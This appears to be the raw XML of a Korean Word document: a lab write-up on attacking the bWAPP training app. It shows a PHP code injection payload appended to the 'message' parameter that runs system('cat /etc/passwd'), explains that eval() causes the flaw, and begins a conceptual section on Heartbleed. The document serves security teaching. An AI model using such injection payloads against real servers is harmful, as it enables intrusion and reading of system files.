                      <wp:docPr id="89" name="직사각형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13525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0A406" id="직사각형 89" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:263.2pt;margin-top:131.3pt;width:66.75pt;height:10.6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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EC27CEA" wp14:editId="53A14558">
                  <wp:extent cx="5342881" cy="2529445"/>
                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                  <wp:docPr id="84" name="그림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7970" cy="2541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A6F2B9" w14:textId="538DAEE9" w:rsidR="00FD4CF4" w:rsidRPr="00BE7966" w:rsidRDefault="0022375D" w:rsidP="0022375D">
            <w:pPr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D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>wapp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에서</w:t>
            </w:r>
            <w:proofErr w:type="gram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/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>php code injection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을 선택해준다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022375D" w:rsidRPr="00BE7966" w14:paraId="6A030528" w14:textId="77777777" w:rsidTr="00EF724A">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A85189E" w14:textId="177C11FA" w:rsidR="0022375D" w:rsidRDefault="0022375D" w:rsidP="002237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717336A4" w14:textId="04DF6D1D" w:rsidR="0022375D" w:rsidRPr="0022375D" w:rsidRDefault="0022375D" w:rsidP="002237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여기서 m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essage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부분을 클릭하게 되면 t</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>est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로 출력되며 링크창이 다음과 같이 변경되는 것을 확인할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="663EC38C" w14:textId="2FC0B416" w:rsidR="0022375D" w:rsidRDefault="0022375D" w:rsidP="002237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30C30AE4" wp14:editId="6CEE24FF">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>4126865</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>266700</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1548130" cy="113030"/>
                      <wp:effectExtent l="19050" t="19050" r="13970" b="20320"/>
                      <wp:wrapNone/>
                      <wp:docPr id="92" name="직사각형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8130" cy="11303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18340" id="직사각형 92" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:324.95pt;margin-top:21pt;width:121.9pt;height:8.9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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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6C2C9B0F" wp14:editId="070E3749">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>3542030</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>2291715</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="372745" cy="254000"/>
                      <wp:effectExtent l="19050" t="19050" r="27305" b="12700"/>
                      <wp:wrapNone/>
                      <wp:docPr id="91" name="직사각형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8D06D" id="직사각형 91" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:278.9pt;margin-top:180.45pt;width:29.35pt;height:20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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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4881D198" wp14:editId="476BADAE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2113280</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="514985" cy="241935"/>
                      <wp:effectExtent l="19050" t="19050" r="18415" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="90" name="직사각형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985" cy="2419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029E7" id="직사각형 90" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:156.45pt;margin-top:166.4pt;width:40.55pt;height:19.0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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FA2774E" wp14:editId="08F2D4F7">
                  <wp:extent cx="3301340" cy="2588260"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="85" name="그림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8025" cy="2601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2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51DF8569" wp14:editId="66E0B8A8">
                  <wp:extent cx="3336158" cy="2592705"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="86" name="그림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486" cy="262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59AEED" w14:textId="24FAF372" w:rsidR="0022375D" w:rsidRDefault="0022375D" w:rsidP="002237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703C722F" w14:textId="10648433" w:rsidR="0022375D" w:rsidRDefault="0022375D" w:rsidP="002237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여기서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링크창에 다음 구문을 추가해준다</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>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;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> system(‘cat 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etc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/passwd | head -3’)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C7E5769" w14:textId="5F11EE3B" w:rsidR="0022375D" w:rsidRDefault="0022375D" w:rsidP="002237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b/>
                <w:noProof/>
                <w:sz w:val="19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615FCF5F" wp14:editId="5618F652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2756535</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4326890" cy="158750"/>
                      <wp:effectExtent l="19050" t="19050" r="16510" b="12700"/>
                      <wp:wrapNone/>
                      <wp:docPr id="95" name="직사각형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6890" cy="1587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76F5E" id="직사각형 95" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:46.1pt;margin-top:217.05pt;width:340.7pt;height:12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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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C526810" wp14:editId="16AE9A35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309880</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="3740150" cy="135255"/>
                      <wp:effectExtent l="19050" t="19050" r="12700" b="17145"/>
                      <wp:wrapNone/>
                      <wp:docPr id="94" name="직사각형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015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EC6A6" id="직사각형 94" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:125pt;margin-top:24.4pt;width:294.5pt;height:10.6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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w: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4F63FBBB" wp14:editId="435EA4BE">
                  <wp:extent cx="5348908" cy="3051707"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="0"/>
                  <wp:docPr id="93" name="그림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5107" cy="307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5058C" w14:textId="32492E7B" w:rsidR="0022375D" w:rsidRDefault="0022375D" w:rsidP="002237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;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뒤에 명령어 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>cat 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etc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/passwd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값이 출력되는 것을 확인할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09339945" w14:textId="044F69BE" w:rsidR="0022375D" w:rsidRDefault="0022375D" w:rsidP="002237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이것은 이미 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>php injection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이 수행된 것이며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p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>hp injection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이 된 이유를 확인해볼 필요가 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="234D5D5A" w14:textId="66846A22" w:rsidR="0022375D" w:rsidRDefault="0022375D" w:rsidP="002237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웹페이지를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우클릭하여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/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Page Source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를 확인한다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022375D" w:rsidRPr="00BE7966" w14:paraId="7164097E" w14:textId="77777777" w:rsidTr="00EF724A">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D6225BF" w14:textId="7546C70D" w:rsidR="0022375D" w:rsidRDefault="00EF724A" w:rsidP="002237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b/>
                <w:noProof/>
                <w:sz w:val="19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824C275" wp14:editId="20E2DD6C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3367405</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2141855" cy="170815"/>
                      <wp:effectExtent l="19050" t="19050" r="10795" b="19685"/>
                      <wp:wrapNone/>
                      <wp:docPr id="96" name="직사각형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1855" cy="1708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62ADA" id="직사각형 96" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:16.15pt;margin-top:265.15pt;width:168.65pt;height:13.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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="0022375D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DE342C5" wp14:editId="3A554E41">
                  <wp:extent cx="5445457" cy="3585845"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                  <wp:docPr id="87" name="그림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6975" cy="360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CE6AD" w14:textId="6C44B8D9" w:rsidR="0022375D" w:rsidRDefault="0022375D" w:rsidP="002237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18D0067B" w14:textId="760A2630" w:rsidR="0022375D" w:rsidRDefault="0022375D" w:rsidP="002237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m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ain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부분을 확인해보면 </w:t>
            </w:r>
            <w:r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bWAPP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phpi.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00EF724A">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">의 </w:t>
            </w:r>
            <w:r w:rsidR="00EF724A">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">message </w:t>
            </w:r>
            <w:r w:rsidR="00EF724A">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>부분이 사용된 것을 확인할 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="010D2C2A" w14:textId="2F639A0E" w:rsidR="0022375D" w:rsidRDefault="00EF724A" w:rsidP="002237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2186968F" wp14:editId="75A7DB2B">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>2900680</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>535305</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1631315" cy="194310"/>
                      <wp:effectExtent l="19050" t="19050" r="26035" b="15240"/>
                      <wp:wrapNone/>
                      <wp:docPr id="97" name="직사각형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315" cy="1943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2AD58" id="직사각형 97" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:228.4pt;margin-top:42.15pt;width:128.45pt;height:15.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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="0022375D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40EC3FF1" wp14:editId="438FEC5E">
                  <wp:extent cx="5390866" cy="1270635"/>
                  <wp:effectExtent l="0" t="0" r="635" b="5715"/>
                  <wp:docPr id="88" name="그림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391" cy="1271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CF4" w:rsidRPr="00BE7966" w14:paraId="13853100" w14:textId="77777777" w:rsidTr="00EF724A">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40CAB8D5" w14:textId="1479DAA7" w:rsidR="00EF724A" w:rsidRDefault="00EF724A" w:rsidP="00EF724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bookmarkStart w:id="2" w:name="_Hlk61445251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그럼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beebox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든 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>kali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로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리버스쉘을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통해 접근하든 하여 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/var/www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bWAPP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phpi.php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내용을 확인해본다.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="19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B074C14" wp14:editId="036BB3C9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2250440</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4279900" cy="226060"/>
                      <wp:effectExtent l="19050" t="19050" r="25400" b="21590"/>
                      <wp:wrapNone/>
                      <wp:docPr id="99" name="직사각형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9900" cy="2260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61B57" id="직사각형 99" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:96.55pt;margin-top:177.2pt;width:337pt;height:17.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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09A96899" wp14:editId="55DCCD22">
                  <wp:extent cx="6127750" cy="3180080"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
                  <wp:docPr id="98" name="그림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0" cy="318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481CCA" w14:textId="0D5B7086" w:rsidR="00EF724A" w:rsidRPr="00D6576D" w:rsidRDefault="00EF724A" w:rsidP="00EF724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p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hp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취약점이 있는 것으로 알려진 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>eval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함수가 해당부분에 사용됐기 때문에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code injection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이 성공했음을 확인할 수 있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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="192B51E2" w14:textId="034AA3A6" w:rsidR="00EF724A" w:rsidRDefault="00EF724A"/>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="0B474856" w14:textId="4BA677A5" w:rsidR="00EF724A" w:rsidRDefault="00EF724A">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3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2"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B0587D" w:rsidRPr="00BE7966" w14:paraId="6855F159" w14:textId="77777777" w:rsidTr="008A727E">
        <w:trPr>
          <w:trHeight w:val="80"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37E85D74" w14:textId="46F62F36" w:rsidR="00B0587D" w:rsidRPr="00BE7966" w:rsidRDefault="00B0587D" w:rsidP="008A727E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9024" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="754BF1D9" wp14:editId="12B66427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102" name="직사각형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BDA5C" id="직사각형 102" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550.5pt;z-index:-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B0587D" w:rsidRPr="0050741D" w14:paraId="05406599" w14:textId="77777777" w:rsidTr="008A727E">
        <w:trPr>
          <w:trHeight w:val="445"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902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4418C4BD" w14:textId="085B898E" w:rsidR="00B0587D" w:rsidRPr="0050741D" w:rsidRDefault="00B0587D" w:rsidP="008A727E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 w:rsidRPr="0050741D">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r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(</w:t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>4</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>)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 </w:t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>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> Heartbleed Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B0587D" w:rsidRPr="00522648" w14:paraId="46D2F1F0" w14:textId="77777777" w:rsidTr="008A727E">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12865761" w14:textId="609F4E46" w:rsidR="00B0587D" w:rsidRPr="00522648" w:rsidRDefault="00B0587D" w:rsidP="00B0587D">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="47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522648">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">공격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개념</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B0587D" w:rsidRPr="00BE7966" w14:paraId="4F69F194" w14:textId="77777777" w:rsidTr="008A727E">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25986BE4" w14:textId="509A31FE" w:rsidR="00B0587D" w:rsidRDefault="00AD03C3" w:rsidP="008A727E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4376D253" wp14:editId="7A2CD4A0">
                  <wp:extent cx="6646545" cy="2756848"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
                  <wp:docPr id="138" name="그림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1390" cy="2767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6FCC4A" w14:textId="6C63DC5A" w:rsidR="00B0587D" w:rsidRDefault="00B0587D" w:rsidP="008A727E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tbl>
            <w:tblPr>
              <w:tblStyle w:val="a3"/>
              <w:tblW w:w="106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86"/>
            </w:tblGrid>
            <w:tr w:rsidR="00B0587D" w:rsidRPr="00D6576D" w14:paraId="51877F3F" w14:textId="77777777" w:rsidTr="008A727E">
              <w:trPr>
                <w:trHeight w:val="424"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="10686" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="3F8CC5C3" w14:textId="6C38EB0E" w:rsidR="00B0587D" w:rsidRDefault="00B0587D" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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H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eartbleed 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취약점은 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2014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년 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4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월 매우 큰 이슈가 되었던 공격이다.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 OpenSSL 1.0.1 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버전에서 발견되었으며 이를 구성하고 있는 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TLS/DTLS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의 </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/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HeartBeat</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/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확장규격에서 발생했고,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이를 이용하면 서버와 클라이언트에서 주고받는 정보들을 탈취할 수 있게 된다.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H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eartBeat</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/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는 원래 서버와 클라이언트 사이에 문제가 없는지를 확인하고 안정적인 연결을 유지하기 위한 목적으로 일정 신호를 </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/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주고 받을</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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 때 사용하는 확장 규격이다.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정상적이라면 클라이언트로부터 받은 정보와 그 정보의 길이가 일치하지 않는다면 요청에 서버가 응답하지 않아야 하나,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이 취약점으로 인하여 길이 일치 여부를 검증하지 않은 채로 정보를 보내주면서 문제가 발생된다.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그림으로 보면 이해하기 편하다</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="084F2227" w14:textId="5F53203C" w:rsidR="00B0587D" w:rsidRDefault="0070593F" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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/>
                      <w:noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13088E44" wp14:editId="24E601A0">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>20130</wp:posOffset>
                            </wp:positionH>
                            <wp:positionV relativeFrom="paragraph">
                              <wp:posOffset>92227</wp:posOffset>
                            </wp:positionV>
                            <wp:extent cx="5404514" cy="4039737"/>
                            <wp:effectExtent l="0" t="0" r="24765" b="18415"/>
                            <wp:wrapNone/>
                            <wp:docPr id="137" name="직사각형 1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404514" cy="40397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BDB42CB" id="직사각형 137" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:1.6pt;margin-top:7.25pt;width:425.55pt;height:318.1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" fillcolor="white [3212]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
                        </w:pict>
                      </mc:Fallback>
                    </mc:AlternateContent>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7F83B658" w14:textId="47227D7A" w:rsidR="00B0587D" w:rsidRDefault="0070593F" w:rsidP="00B0587D">
                  <w:pPr>
                    <w:ind w:firstLineChars="50" w:firstLine="95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noProof/>
                      <w:sz w:val="19"/>
                      <w:szCs w:val="19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914333A" wp14:editId="26D92893">
                            <wp:simplePos x="0" y="0"/>
                            <wp:positionH relativeFrom="column">
                              <wp:posOffset>181927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1596390" cy="654685"/>
                            <wp:effectExtent l="0" t="0" r="22860" b="126365"/>
                            <wp:wrapNone/>
                            <wp:docPr id="131" name="말풍선: 사각형 1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96390" cy="654685"/>
                                    </a:xfrm>
                                    <a:prstGeom prst="wedgeRectCallout">
                                      <a:avLst>
                                        <a:gd name="adj1" fmla="val -45626"/>
                                        <a:gd name="adj2" fmla="val 64584"/>
                                      </a:avLst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92DDE50" w14:textId="5B0C380D" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                        <w:r>
                                          <w:rPr>
                                            <w:rFonts w:hint="eastAsia"/>
                                          </w:rPr>
                                          <w:t>서버 응답가능한지?</w:t>
                                        </w:r>
                                      </w:p>
                                      <w:p w14:paraId="7ECF2322" w14:textId="4A3608CC" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0070593F">
                                        <w:r>
                                          <w:rPr>
                                            <w:rFonts w:hint="eastAsia"/>
                                          </w:rPr>
                                          <w:t>가능하면 2글자로 응답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914333A" id="_x0000_t61" coordsize="21600,21600" o:spt="61" adj="1350,25920" path="m,l0@8@12@24,0@9,,21600@6,21600@15@27@7,21600,21600,21600,21600@9@18@30,21600@8,21600,0@7,0@21@33@6,xe">
                            <v:stroke joinstyle="miter"/>
                            <v:formulas>
                              <v:f eqn="sum 10800 0 #0"/>
                              <v:f eqn="sum 10800 0 #1"/>
                              <v:f eqn="sum #0 0 #1"/>
                              <v:f eqn="sum @0 @1 0"/>
                              <v:f eqn="sum 21600 0 #0"/>
                              <v:f eqn="sum 21600 0 #1"/>
                              <v:f eqn="if @0 3600 12600"/>
                              <v:f eqn="if @0 9000 18000"/>
                              <v:f eqn="if @1 3600 12600"/>
                              <v:f eqn="if @1 9000 18000"/>
                              <v:f eqn="if @2 0 #0"/>
                              <v:f eqn="if @3 @10 0"/>
                              <v:f eqn="if #0 0 @11"/>
                              <v:f eqn="if @2 @6 #0"/>
                              <v:f eqn="if @3 @6 @13"/>
                              <v:f eqn="if @5 @6 @14"/>
                              <v:f eqn="if @2 #0 21600"/>
                              <v:f eqn="if @3 21600 @16"/>
                              <v:f eqn="if @4 21600 @17"/>
                              <v:f eqn="if @2 #0 @6"/>
                              <v:f eqn="if @3 @19 @6"/>
                              <v:f eqn="if #1 @6 @20"/>
                              <v:f eqn="if @2 @8 #1"/>
                              <v:f eqn="if @3 @22 @8"/>
                              <v:f eqn="if #0 @8 @23"/>
                              <v:f eqn="if @2 21600 #1"/>
                              <v:f eqn="if @3 21600 @25"/>
                              <v:f eqn="if @5 21600 @26"/>
                              <v:f eqn="if @2 #1 @8"/>
                              <v:f eqn="if @3 @8 @28"/>
                              <v:f eqn="if @4 @8 @29"/>
                              <v:f eqn="if @2 #1 0"/>
                              <v:f eqn="if @3 @31 0"/>
                              <v:f eqn="if #1 0 @32"/>
                              <v:f eqn="val #0"/>
                              <v:f eqn="val #1"/>
                            </v:formulas>
                            <v:path o:connecttype="custom" o:connectlocs="10800,0;0,10800;10800,21600;21600,10800;@34,@35"/>
                            <v:handles>
                              <v:h position="#0,#1"/>
                            </v:handles>
                          </v:shapetype>
